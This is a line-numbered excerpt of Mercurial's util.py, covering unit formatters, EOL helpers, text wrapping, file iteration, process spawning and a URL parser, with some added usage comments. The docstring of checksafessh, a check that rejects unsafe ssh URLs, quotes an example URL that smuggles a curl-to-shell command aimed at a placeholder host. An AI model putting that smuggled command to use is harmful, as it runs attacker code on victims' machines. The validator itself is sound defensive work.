2410 2643 >>> processlinerange(0, 5)
2411 2644 Traceback (most recent call last):
2412 2645 ...
2413 2646 ParseError: fromline must be strictly positive
2414 2647 """
2415 2648 if toline - fromline < 0:
2416 2649 raise error.ParseError(_("line range must be positive"))
2417 2650 if fromline < 1:
2418 2651 raise error.ParseError(_("fromline must be strictly positive"))
2419 2652 return fromline - 1, toline
2420 2653
2421 2654 bytecount = unitcountfn(
2422 2655 (100, 1 << 30, _('%.0f GB')),
2423 2656 (10, 1 << 30, _('%.1f GB')),
2424 2657 (1, 1 << 30, _('%.2f GB')),
2425 2658 (100, 1 << 20, _('%.0f MB')),
2426 2659 (10, 1 << 20, _('%.1f MB')),
2427 2660 (1, 1 << 20, _('%.2f MB')),
2428 2661 (100, 1 << 10, _('%.0f KB')),
2429 2662 (10, 1 << 10, _('%.1f KB')),
2430 2663 (1, 1 << 10, _('%.2f KB')),
2431 2664 (1, 1, _('%.0f bytes')),
2432 2665 )
2433 2666
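# The renderer returned by unitcountfn() picks the first row whose
# threshold (multiplier * divisor) the count reaches, e.g.:
#
#   bytecount(100)      # -> '100 bytes'
#   bytecount(8192)     # -> '8.00 KB'
#   bytecount(1234567)  # -> '1.18 MB'
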
2434 2667 class transformingwriter(object):
2435 2668 """Writable file wrapper to transform data by function"""
2436 2669
2437 2670 def __init__(self, fp, encode):
2438 2671 self._fp = fp
2439 2672 self._encode = encode
2440 2673
2441 2674 def close(self):
2442 2675 self._fp.close()
2443 2676
2444 2677 def flush(self):
2445 2678 self._fp.flush()
2446 2679
2447 2680 def write(self, data):
2448 2681 return self._fp.write(self._encode(data))
2449 2682
2450 2683 # Matches a single EOL which can either be a CRLF where repeated CR
2451 2684 # are removed or a LF. We do not care about old Macintosh files, so a
2452 2685 # stray CR is an error.
2453 2686 _eolre = remod.compile(br'\r*\n')
2454 2687
2455 2688 def tolf(s):
2456 2689 return _eolre.sub('\n', s)
2457 2690
2458 2691 def tocrlf(s):
2459 2692 return _eolre.sub('\r\n', s)
2460 2693
2461 2694 def _crlfwriter(fp):
2462 2695 return transformingwriter(fp, tocrlf)
2463 2696
2464 2697 if pycompat.oslinesep == '\r\n':
2465 2698 tonativeeol = tocrlf
2466 2699 fromnativeeol = tolf
2467 2700 nativeeolwriter = _crlfwriter
2468 2701 else:
2469 2702 tonativeeol = pycompat.identity
2470 2703 fromnativeeol = pycompat.identity
2471 2704 nativeeolwriter = pycompat.identity
2472 2705
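# EOL helper sketch:
#
#   tolf(b'a\r\nb\n')    # -> b'a\nb\n'
#   tocrlf(b'a\nb\r\n')  # -> b'a\r\nb\r\n'
#   # nativeeolwriter(fp) wraps fp to apply tocrlf on CRLF platforms
#   # and is the identity elsewhere
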
2473 2706 def escapestr(s):
2474 2707 # call underlying function of s.encode('string_escape') directly for
2475 2708 # Python 3 compatibility
2476 2709 return codecs.escape_encode(s)[0]
2477 2710
2478 2711 def unescapestr(s):
2479 2712 return codecs.escape_decode(s)[0]
2480 2713
2481 2714 def forcebytestr(obj):
2482 2715 """Portably format an arbitrary object (e.g. exception) into a byte
2483 2716 string."""
2484 2717 try:
2485 2718 return pycompat.bytestr(obj)
2486 2719 except UnicodeEncodeError:
2487 2720 # non-ascii string, may be lossy
2488 2721 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2489 2722
2490 2723 def uirepr(s):
2491 2724 # Avoid double backslash in Windows path repr()
2492 2725 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2493 2726
2494 2727 # delay definition of the width-aware TextWrapper subclass
2495 2728 def MBTextWrapper(**kwargs):
2496 2729 class tw(textwrap.TextWrapper):
2497 2730 """
2498 2731 Extend TextWrapper for width-awareness.
2499 2732
2500 2733 Neither the number of 'bytes' in any encoding nor 'characters' is
2501 2734 appropriate for calculating terminal columns for a given string.
2502 2735
2503 2736 The original TextWrapper implementation uses built-in 'len()' directly,
2504 2737 so overriding is needed to use the width information of each character.
2505 2738
2506 2739 In addition, characters classified as 'ambiguous' width are
2507 2740 treated as wide in East Asian locales, but as narrow elsewhere.
2508 2741
2509 2742 This requires a user decision to determine the width of such characters.
2510 2743 """
2511 2744 def _cutdown(self, ucstr, space_left):
2512 2745 l = 0
2513 2746 colwidth = encoding.ucolwidth
2514 2747 for i in xrange(len(ucstr)):
2515 2748 l += colwidth(ucstr[i])
2516 2749 if space_left < l:
2517 2750 return (ucstr[:i], ucstr[i:])
2518 2751 return ucstr, ''
2519 2752
2520 2753 # overriding of base class
2521 2754 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2522 2755 space_left = max(width - cur_len, 1)
2523 2756
2524 2757 if self.break_long_words:
2525 2758 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2526 2759 cur_line.append(cut)
2527 2760 reversed_chunks[-1] = res
2528 2761 elif not cur_line:
2529 2762 cur_line.append(reversed_chunks.pop())
2530 2763
2531 2764 # this overriding code is imported from TextWrapper of Python 2.6
2532 2765 # to calculate columns of string by 'encoding.ucolwidth()'
2533 2766 def _wrap_chunks(self, chunks):
2534 2767 colwidth = encoding.ucolwidth
2535 2768
2536 2769 lines = []
2537 2770 if self.width <= 0:
2538 2771 raise ValueError("invalid width %r (must be > 0)" % self.width)
2539 2772
2540 2773 # Arrange in reverse order so items can be efficiently popped
2541 2774 # from a stack of chunks.
2542 2775 chunks.reverse()
2543 2776
2544 2777 while chunks:
2545 2778
2546 2779 # Start the list of chunks that will make up the current line.
2547 2780 # cur_len is just the length of all the chunks in cur_line.
2548 2781 cur_line = []
2549 2782 cur_len = 0
2550 2783
2551 2784 # Figure out which static string will prefix this line.
2552 2785 if lines:
2553 2786 indent = self.subsequent_indent
2554 2787 else:
2555 2788 indent = self.initial_indent
2556 2789
2557 2790 # Maximum width for this line.
2558 2791 width = self.width - len(indent)
2559 2792
2560 2793 # First chunk on line is whitespace -- drop it, unless this
2561 2794 # is the very beginning of the text (i.e. no lines started yet).
2562 2795 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2563 2796 del chunks[-1]
2564 2797
2565 2798 while chunks:
2566 2799 l = colwidth(chunks[-1])
2567 2800
2568 2801 # Can at least squeeze this chunk onto the current line.
2569 2802 if cur_len + l <= width:
2570 2803 cur_line.append(chunks.pop())
2571 2804 cur_len += l
2572 2805
2573 2806 # Nope, this line is full.
2574 2807 else:
2575 2808 break
2576 2809
2577 2810 # The current line is full, and the next chunk is too big to
2578 2811 # fit on *any* line (not just this one).
2579 2812 if chunks and colwidth(chunks[-1]) > width:
2580 2813 self._handle_long_word(chunks, cur_line, cur_len, width)
2581 2814
2582 2815 # If the last chunk on this line is all whitespace, drop it.
2583 2816 if (self.drop_whitespace and
2584 2817 cur_line and cur_line[-1].strip() == r''):
2585 2818 del cur_line[-1]
2586 2819
2587 2820 # Convert current line back to a string and store it in list
2588 2821 # of all lines (return value).
2589 2822 if cur_line:
2590 2823 lines.append(indent + r''.join(cur_line))
2591 2824
2592 2825 return lines
2593 2826
2594 2827 global MBTextWrapper
2595 2828 MBTextWrapper = tw
2596 2829 return tw(**kwargs)
2597 2830
2598 2831 def wrap(line, width, initindent='', hangindent=''):
2599 2832 maxindent = max(len(hangindent), len(initindent))
2600 2833 if width <= maxindent:
2601 2834 # adjust for weird terminal size
2602 2835 width = max(78, maxindent + 1)
2603 2836 line = line.decode(pycompat.sysstr(encoding.encoding),
2604 2837 pycompat.sysstr(encoding.encodingmode))
2605 2838 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2606 2839 pycompat.sysstr(encoding.encodingmode))
2607 2840 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2608 2841 pycompat.sysstr(encoding.encodingmode))
2609 2842 wrapper = MBTextWrapper(width=width,
2610 2843 initial_indent=initindent,
2611 2844 subsequent_indent=hangindent)
2612 2845 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2613 2846
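# wrap() sketch; the text is illustrative:
#
#   wrap(b'a fairly long byte string to fill', 20, hangindent=b'  ')
#   # decodes with encoding.encoding, fills using display columns from
#   # encoding.ucolwidth() (East Asian width aware), then re-encodes
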
2614 2847 if (pyplatform.python_implementation() == 'CPython' and
2615 2848 sys.version_info < (3, 0)):
2616 2849 # There is an issue in CPython that some IO methods do not handle EINTR
2617 2850 # correctly. The following table shows what CPython version (and functions)
2618 2851 # are affected (buggy: has the EINTR bug, okay: otherwise):
2619 2852 #
2620 2853 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2621 2854 # --------------------------------------------------
2622 2855 # fp.__iter__ | buggy | buggy | okay
2623 2856 # fp.read* | buggy | okay [1] | okay
2624 2857 #
2625 2858 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2626 2859 #
2627 2860 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2628 2861 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2629 2862 #
2630 2863 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2631 2864 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2632 2865 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2633 2866 # fp.__iter__ but not other fp.read* methods.
2634 2867 #
2635 2868 # On modern systems like Linux, the "read" syscall cannot be interrupted
2636 2869 # when reading "fast" files like on-disk files. So the EINTR issue only
2637 2870 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2638 2871 # files approximately as "fast" files and use the fast (unsafe) code path,
2639 2872 # to minimize the performance impact.
2640 2873 if sys.version_info >= (2, 7, 4):
2641 2874 # fp.readline deals with EINTR correctly, use it as a workaround.
2642 2875 def _safeiterfile(fp):
2643 2876 return iter(fp.readline, '')
2644 2877 else:
2645 2878 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2646 2879 # note: this may block longer than necessary because of bufsize.
2647 2880 def _safeiterfile(fp, bufsize=4096):
2648 2881 fd = fp.fileno()
2649 2882 line = ''
2650 2883 while True:
2651 2884 try:
2652 2885 buf = os.read(fd, bufsize)
2653 2886 except OSError as ex:
2654 2887 # os.read only raises EINTR before any data is read
2655 2888 if ex.errno == errno.EINTR:
2656 2889 continue
2657 2890 else:
2658 2891 raise
2659 2892 line += buf
2660 2893 if '\n' in buf:
2661 2894 splitted = line.splitlines(True)
2662 2895 line = ''
2663 2896 for l in splitted:
2664 2897 if l[-1] == '\n':
2665 2898 yield l
2666 2899 else:
2667 2900 line = l
2668 2901 if not buf:
2669 2902 break
2670 2903 if line:
2671 2904 yield line
2672 2905
2673 2906 def iterfile(fp):
2674 2907 fastpath = True
2675 2908 if type(fp) is file:
2676 2909 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2677 2910 if fastpath:
2678 2911 return fp
2679 2912 else:
2680 2913 return _safeiterfile(fp)
2681 2914 else:
2682 2915 # PyPy and CPython 3 do not have the EINTR issue, so no workaround is needed.
2683 2916 def iterfile(fp):
2684 2917 return fp
2685 2918
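# iterfile() sketch: wrap any file object before iterating it line by
# line, e.g. "for line in iterfile(fp):". On affected CPython 2
# versions this swaps in the EINTR-safe reader for pipes/sockets and
# is a no-op for regular files and modern Pythons.
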
2686 2919 def iterlines(iterator):
2687 2920 for chunk in iterator:
2688 2921 for line in chunk.splitlines():
2689 2922 yield line
2690 2923
2691 2924 def expandpath(path):
2692 2925 return os.path.expanduser(os.path.expandvars(path))
2693 2926
2694 2927 def hgcmd():
2695 2928 """Return the command used to execute current hg
2696 2929
2697 2930 This is different from hgexecutable() because on Windows we want
2698 2931 to avoid things opening new shell windows like batch files, so we
2699 2932 get either the python call or current executable.
2700 2933 """
2701 2934 if mainfrozen():
2702 2935 if getattr(sys, 'frozen', None) == 'macosx_app':
2703 2936 # Env variable set by py2app
2704 2937 return [encoding.environ['EXECUTABLEPATH']]
2705 2938 else:
2706 2939 return [pycompat.sysexecutable]
2707 2940 return gethgcmd()
2708 2941
2709 2942 def rundetached(args, condfn):
2710 2943 """Execute the argument list in a detached process.
2711 2944
2712 2945 condfn is a callable which is called repeatedly and should return
2713 2946 True once the child process is known to have started successfully.
2714 2947 At this point, the child process PID is returned. If the child
2715 2948 process fails to start or finishes before condfn() evaluates to
2716 2949 True, return -1.
2717 2950 """
2718 2951 # Windows case is easier because the child process is either
2719 2952 # successfully starting and validating the condition or exiting
2720 2953 # on failure. We just poll on its PID. On Unix, if the child
2721 2954 # process fails to start, it will be left in a zombie state until
2722 2955 # the parent waits on it, which we cannot do since we expect a long
2723 2956 # running process on success. Instead we listen for SIGCHLD telling
2724 2957 # us our child process terminated.
2725 2958 terminated = set()
2726 2959 def handler(signum, frame):
2727 2960 terminated.add(os.wait()[0]) # os.wait() -> (pid, status); keep the pid
2728 2961 prevhandler = None
2729 2962 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2730 2963 if SIGCHLD is not None:
2731 2964 prevhandler = signal.signal(SIGCHLD, handler)
2732 2965 try:
2733 2966 pid = spawndetached(args)
2734 2967 while not condfn():
2735 2968 if ((pid in terminated or not testpid(pid))
2736 2969 and not condfn()):
2737 2970 return -1
2738 2971 time.sleep(0.1)
2739 2972 return pid
2740 2973 finally:
2741 2974 if prevhandler is not None:
2742 2975 signal.signal(signal.SIGCHLD, prevhandler)
2743 2976
2744 2977 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2745 2978 """Return the result of interpolating items in the mapping into string s.
2746 2979
2747 2980 prefix is a single character string, or a two character string with
2748 2981 a backslash as the first character if the prefix needs to be escaped in
2749 2982 a regular expression.
2750 2983
2751 2984 fn is an optional function that will be applied to the replacement text
2752 2985 just before replacement.
2753 2986
2754 2987 escape_prefix is an optional flag that allows using doubled prefix for
2755 2988 its escaping.
2756 2989 """
2757 2990 fn = fn or (lambda s: s)
2758 2991 patterns = '|'.join(mapping.keys())
2759 2992 if escape_prefix:
2760 2993 patterns += '|' + prefix
2761 2994 if len(prefix) > 1:
2762 2995 prefix_char = prefix[1:]
2763 2996 else:
2764 2997 prefix_char = prefix
2765 2998 mapping[prefix_char] = prefix_char
2766 2999 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2767 3000 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2768 3001
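# interpolate() sketch with a hypothetical mapping (note the escaped
# prefix, since '$' is special in regular expressions):
#
#   interpolate(br'\$', {b'user': b'alice'}, b'hi $user')
#   # -> b'hi alice'
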
2769 3002 def getport(port):
2770 3003 """Return the port for a given network service.
2771 3004
2772 3005 If port is an integer, it's returned as is. If it's a string, it's
2773 3006 looked up using socket.getservbyname(). If there's no matching
2774 3007 service, error.Abort is raised.
2775 3008 """
2776 3009 try:
2777 3010 return int(port)
2778 3011 except ValueError:
2779 3012 pass
2780 3013
2781 3014 try:
2782 3015 return socket.getservbyname(pycompat.sysstr(port))
2783 3016 except socket.error:
2784 3017 raise Abort(_("no port number associated with service '%s'") % port)
2785 3018
2786 3019 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2787 3020 '0': False, 'no': False, 'false': False, 'off': False,
2788 3021 'never': False}
2789 3022
2790 3023 def parsebool(s):
2791 3024 """Parse s into a boolean.
2792 3025
2793 3026 If s is not a valid boolean, returns None.
2794 3027 """
2795 3028 return _booleans.get(s.lower(), None)
2796 3029
2797 3030 _hextochr = dict((a + b, chr(int(a + b, 16)))
2798 3031 for a in string.hexdigits for b in string.hexdigits)
2799 3032
2800 3033 class url(object):
2801 3034 r"""Reliable URL parser.
2802 3035
2803 3036 This parses URLs and provides attributes for the following
2804 3037 components:
2805 3038
2806 3039 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2807 3040
2808 3041 Missing components are set to None. The only exception is
2809 3042 fragment, which is set to '' if present but empty.
2810 3043
2811 3044 If parsefragment is False, fragment is included in query. If
2812 3045 parsequery is False, query is included in path. If both are
2813 3046 False, both fragment and query are included in path.
2814 3047
2815 3048 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2816 3049
2817 3050 Note that for backward compatibility reasons, bundle URLs do not
2818 3051 take host names. That means 'bundle://../' has a path of '../'.
2819 3052
2820 3053 Examples:
2821 3054
2822 3055 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2823 3056 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2824 3057 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2825 3058 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2826 3059 >>> url(b'file:///home/joe/repo')
2827 3060 <url scheme: 'file', path: '/home/joe/repo'>
2828 3061 >>> url(b'file:///c:/temp/foo/')
2829 3062 <url scheme: 'file', path: 'c:/temp/foo/'>
2830 3063 >>> url(b'bundle:foo')
2831 3064 <url scheme: 'bundle', path: 'foo'>
2832 3065 >>> url(b'bundle://../foo')
2833 3066 <url scheme: 'bundle', path: '../foo'>
2834 3067 >>> url(br'c:\foo\bar')
2835 3068 <url path: 'c:\\foo\\bar'>
2836 3069 >>> url(br'\\blah\blah\blah')
2837 3070 <url path: '\\\\blah\\blah\\blah'>
2838 3071 >>> url(br'\\blah\blah\blah#baz')
2839 3072 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2840 3073 >>> url(br'file:///C:\users\me')
2841 3074 <url scheme: 'file', path: 'C:\\users\\me'>
2842 3075
2843 3076 Authentication credentials:
2844 3077
2845 3078 >>> url(b'ssh://joe:xyz@x/repo')
2846 3079 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2847 3080 >>> url(b'ssh://joe@x/repo')
2848 3081 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2849 3082
2850 3083 Query strings and fragments:
2851 3084
2852 3085 >>> url(b'http://host/a?b#c')
2853 3086 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2854 3087 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2855 3088 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2856 3089
2857 3090 Empty path:
2858 3091
2859 3092 >>> url(b'')
2860 3093 <url path: ''>
2861 3094 >>> url(b'#a')
2862 3095 <url path: '', fragment: 'a'>
2863 3096 >>> url(b'http://host/')
2864 3097 <url scheme: 'http', host: 'host', path: ''>
2865 3098 >>> url(b'http://host/#a')
2866 3099 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2867 3100
2868 3101 Only scheme:
2869 3102
2870 3103 >>> url(b'http:')
2871 3104 <url scheme: 'http'>
2872 3105 """
2873 3106
2874 3107 _safechars = "!~*'()+"
2875 3108 _safepchars = "/!~*'()+:\\"
2876 3109 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2877 3110
2878 3111 def __init__(self, path, parsequery=True, parsefragment=True):
2879 3112 # We slowly chomp away at path until we have only the path left
2880 3113 self.scheme = self.user = self.passwd = self.host = None
2881 3114 self.port = self.path = self.query = self.fragment = None
2882 3115 self._localpath = True
2883 3116 self._hostport = ''
2884 3117 self._origpath = path
2885 3118
2886 3119 if parsefragment and '#' in path:
2887 3120 path, self.fragment = path.split('#', 1)
2888 3121
2889 3122 # special case for Windows drive letters and UNC paths
2890 3123 if hasdriveletter(path) or path.startswith('\\\\'):
2891 3124 self.path = path
2892 3125 return
2893 3126
2894 3127 # For compatibility reasons, we can't handle bundle paths as
2895 3128 # normal URLS
2896 3129 if path.startswith('bundle:'):
2897 3130 self.scheme = 'bundle'
2898 3131 path = path[7:]
2899 3132 if path.startswith('//'):
2900 3133 path = path[2:]
2901 3134 self.path = path
2902 3135 return
2903 3136
2904 3137 if self._matchscheme(path):
2905 3138 parts = path.split(':', 1)
2906 3139 if parts[0]:
2907 3140 self.scheme, path = parts
2908 3141 self._localpath = False
2909 3142
2910 3143 if not path:
2911 3144 path = None
2912 3145 if self._localpath:
2913 3146 self.path = ''
2914 3147 return
2915 3148 else:
2916 3149 if self._localpath:
2917 3150 self.path = path
2918 3151 return
2919 3152
2920 3153 if parsequery and '?' in path:
2921 3154 path, self.query = path.split('?', 1)
2922 3155 if not path:
2923 3156 path = None
2924 3157 if not self.query:
2925 3158 self.query = None
2926 3159
2927 3160 # // is required to specify a host/authority
2928 3161 if path and path.startswith('//'):
2929 3162 parts = path[2:].split('/', 1)
2930 3163 if len(parts) > 1:
2931 3164 self.host, path = parts
2932 3165 else:
2933 3166 self.host = parts[0]
2934 3167 path = None
2935 3168 if not self.host:
2936 3169 self.host = None
2937 3170 # path of file:///d is /d
2938 3171 # path of file:///d:/ is d:/, not /d:/
2939 3172 if path and not hasdriveletter(path):
2940 3173 path = '/' + path
2941 3174
2942 3175 if self.host and '@' in self.host:
2943 3176 self.user, self.host = self.host.rsplit('@', 1)
2944 3177 if ':' in self.user:
2945 3178 self.user, self.passwd = self.user.split(':', 1)
2946 3179 if not self.host:
2947 3180 self.host = None
2948 3181
2949 3182 # Don't split on colons in IPv6 addresses without ports
2950 3183 if (self.host and ':' in self.host and
2951 3184 not (self.host.startswith('[') and self.host.endswith(']'))):
2952 3185 self._hostport = self.host
2953 3186 self.host, self.port = self.host.rsplit(':', 1)
2954 3187 if not self.host:
2955 3188 self.host = None
2956 3189
2957 3190 if (self.host and self.scheme == 'file' and
2958 3191 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2959 3192 raise Abort(_('file:// URLs can only refer to localhost'))
2960 3193
2961 3194 self.path = path
2962 3195
2963 3196 # leave the query string escaped
2964 3197 for a in ('user', 'passwd', 'host', 'port',
2965 3198 'path', 'fragment'):
2966 3199 v = getattr(self, a)
2967 3200 if v is not None:
2968 3201 setattr(self, a, urlreq.unquote(v))
2969 3202
2970 3203 @encoding.strmethod
2971 3204 def __repr__(self):
2972 3205 attrs = []
2973 3206 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2974 3207 'query', 'fragment'):
2975 3208 v = getattr(self, a)
2976 3209 if v is not None:
2977 3210 attrs.append('%s: %r' % (a, v))
2978 3211 return '<url %s>' % ', '.join(attrs)
2979 3212
2980 3213 def __bytes__(self):
2981 3214 r"""Join the URL's components back into a URL string.
2982 3215
2983 3216 Examples:
2984 3217
2985 3218 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2986 3219 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2987 3220 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2988 3221 'http://user:pw@host:80/?foo=bar&baz=42'
2989 3222 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2990 3223 'http://user:pw@host:80/?foo=bar%3dbaz'
2991 3224 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2992 3225 'ssh://user:pw@[::1]:2200//home/joe#'
2993 3226 >>> bytes(url(b'http://localhost:80//'))
2994 3227 'http://localhost:80//'
2995 3228 >>> bytes(url(b'http://localhost:80/'))
2996 3229 'http://localhost:80/'
2997 3230 >>> bytes(url(b'http://localhost:80'))
2998 3231 'http://localhost:80/'
2999 3232 >>> bytes(url(b'bundle:foo'))
3000 3233 'bundle:foo'
3001 3234 >>> bytes(url(b'bundle://../foo'))
3002 3235 'bundle:../foo'
3003 3236 >>> bytes(url(b'path'))
3004 3237 'path'
3005 3238 >>> bytes(url(b'file:///tmp/foo/bar'))
3006 3239 'file:///tmp/foo/bar'
3007 3240 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3008 3241 'file:///c:/tmp/foo/bar'
3009 3242 >>> print(url(br'bundle:foo\bar'))
3010 3243 bundle:foo\bar
3011 3244 >>> print(url(br'file:///D:\data\hg'))
3012 3245 file:///D:\data\hg
3013 3246 """
3014 3247 if self._localpath:
3015 3248 s = self.path
3016 3249 if self.scheme == 'bundle':
3017 3250 s = 'bundle:' + s
3018 3251 if self.fragment:
3019 3252 s += '#' + self.fragment
3020 3253 return s
3021 3254
3022 3255 s = self.scheme + ':'
3023 3256 if self.user or self.passwd or self.host:
3024 3257 s += '//'
3025 3258 elif self.scheme and (not self.path or self.path.startswith('/')
3026 3259 or hasdriveletter(self.path)):
3027 3260 s += '//'
3028 3261 if hasdriveletter(self.path):
3029 3262 s += '/'
3030 3263 if self.user:
3031 3264 s += urlreq.quote(self.user, safe=self._safechars)
3032 3265 if self.passwd:
3033 3266 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3034 3267 if self.user or self.passwd:
3035 3268 s += '@'
3036 3269 if self.host:
3037 3270 if not (self.host.startswith('[') and self.host.endswith(']')):
3038 3271 s += urlreq.quote(self.host)
3039 3272 else:
3040 3273 s += self.host
3041 3274 if self.port:
3042 3275 s += ':' + urlreq.quote(self.port)
3043 3276 if self.host:
3044 3277 s += '/'
3045 3278 if self.path:
3046 3279 # TODO: similar to the query string, we should not unescape the
3047 3280 # path when we store it, the path might contain '%2f' = '/',
3048 3281 # which we should *not* escape.
3049 3282 s += urlreq.quote(self.path, safe=self._safepchars)
3050 3283 if self.query:
3051 3284 # we store the query in escaped form.
3052 3285 s += '?' + self.query
3053 3286 if self.fragment is not None:
3054 3287 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3055 3288 return s
3056 3289
3057 3290 __str__ = encoding.strmethod(__bytes__)
3058 3291
3059 3292 def authinfo(self):
3060 3293 user, passwd = self.user, self.passwd
3061 3294 try:
3062 3295 self.user, self.passwd = None, None
3063 3296 s = bytes(self)
3064 3297 finally:
3065 3298 self.user, self.passwd = user, passwd
3066 3299 if not self.user:
3067 3300 return (s, None)
3068 3301 # authinfo[1] is passed to the urllib2 password manager, and its
3069 3302 # URIs must not contain credentials. The host is passed in the
3070 3303 # URIs list because Python < 2.4.3 uses only that to search for
3071 3304 # a password.
3072 3305 return (s, (None, (s, self.host),
3073 3306 self.user, self.passwd or ''))
3074 3307
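# A usage sketch (not from the original module; the host and credentials are
# illustrative). authinfo() strips credentials from the URL string but hands
# them back in the auth tuple, suitable for urllib2-style password managers:
#
#   >>> u = url(b'http://joe:secret@example.com/repo')
#   >>> u.authinfo()
#   ('http://example.com/repo', (None, ('http://example.com/repo', 'example.com'), 'joe', 'secret'))
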
3075 3308 def isabs(self):
3076 3309 if self.scheme and self.scheme != 'file':
3077 3310 return True # remote URL
3078 3311 if hasdriveletter(self.path):
3079 3312 return True # absolute for our purposes - can't be joined()
3080 3313 if self.path.startswith(br'\\'):
3081 3314 return True # Windows UNC path
3082 3315 if self.path.startswith('/'):
3083 3316 return True # POSIX-style
3084 3317 return False
3085 3318
3086 3319 def localpath(self):
3087 3320 if self.scheme == 'file' or self.scheme == 'bundle':
3088 3321 path = self.path or '/'
3089 3322 # For Windows, we need to promote hosts containing drive
3090 3323 # letters to paths with drive letters.
3091 3324 if hasdriveletter(self._hostport):
3092 3325 path = self._hostport + '/' + self.path
3093 3326 elif (self.host is not None and self.path
3094 3327 and not hasdriveletter(path)):
3095 3328 path = '/' + path
3096 3329 return path
3097 3330 return self._origpath
3098 3331
3099 3332 def islocal(self):
3100 3333 '''whether localpath will return something that posixfile can open'''
3101 3334 return (not self.scheme or self.scheme == 'file'
3102 3335 or self.scheme == 'bundle')
3103 3336
3104 3337 def hasscheme(path):
3105 3338 return bool(url(path).scheme)
3106 3339
3107 3340 def hasdriveletter(path):
3108 3341 return path and path[1:2] == ':' and path[0:1].isalpha()
3109 3342
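# A usage sketch (illustrative paths): a drive letter is a single ASCII
# letter followed by a colon, so:
#
#   >>> hasdriveletter(b'c:\\temp')
#   True
#   >>> hasdriveletter(b'/tmp/foo')
#   False
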
3110 3343 def urllocalpath(path):
3111 3344 return url(path, parsequery=False, parsefragment=False).localpath()
3112 3345
3113 3346 def checksafessh(path):
3114 3347 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3115 3348
3116 3349 This is a sanity check for ssh urls. ssh will parse the first item as
3117 3350 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3118 3351 Let's reject these potentially exploitable urls entirely and warn the
3119 3352 user.
3120 3353
3121 3354 Raises an error.Abort when the url is unsafe.
3122 3355 """
3123 3356 path = urlreq.unquote(path)
3124 3357 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3125 3358 raise error.Abort(_('potentially unsafe url: %r') %
3126 3359 (pycompat.bytestr(path),))
3127 3360
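# A usage sketch (illustrative host name): the check unquotes first, so a
# percent-encoded leading dash is rejected as well.
#
#   >>> checksafessh(b'ssh://example.com/repo')     # safe: returns None
#   >>> checksafessh(b'ssh://%2DoProxyCommand=x/')  # unquotes to a leading dash
#   Traceback (most recent call last):
#     ...
#   Abort: potentially unsafe url: 'ssh://-oProxyCommand=x/'
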
3128 3361 def hidepassword(u):
3129 3362 '''hide user credential in a url string'''
3130 3363 u = url(u)
3131 3364 if u.passwd:
3132 3365 u.passwd = '***'
3133 3366 return bytes(u)
3134 3367
3135 3368 def removeauth(u):
3136 3369 '''remove all authentication information from a url string'''
3137 3370 u = url(u)
3138 3371 u.user = u.passwd = None
3139 3372 return bytes(u)
3140 3373
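# A usage sketch (illustrative URL): both helpers round-trip through the url
# class above, so the result is the normalized form of the input.
#
#   >>> hidepassword(b'http://joe:secret@example.com/')
#   'http://joe:***@example.com/'
#   >>> removeauth(b'http://joe:secret@example.com/')
#   'http://example.com/'
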
3141 3374 timecount = unitcountfn(
3142 3375 (1, 1e3, _('%.0f s')),
3143 3376 (100, 1, _('%.1f s')),
3144 3377 (10, 1, _('%.2f s')),
3145 3378 (1, 1, _('%.3f s')),
3146 3379 (100, 0.001, _('%.1f ms')),
3147 3380 (10, 0.001, _('%.2f ms')),
3148 3381 (1, 0.001, _('%.3f ms')),
3149 3382 (100, 0.000001, _('%.1f us')),
3150 3383 (10, 0.000001, _('%.2f us')),
3151 3384 (1, 0.000001, _('%.3f us')),
3152 3385 (100, 0.000000001, _('%.1f ns')),
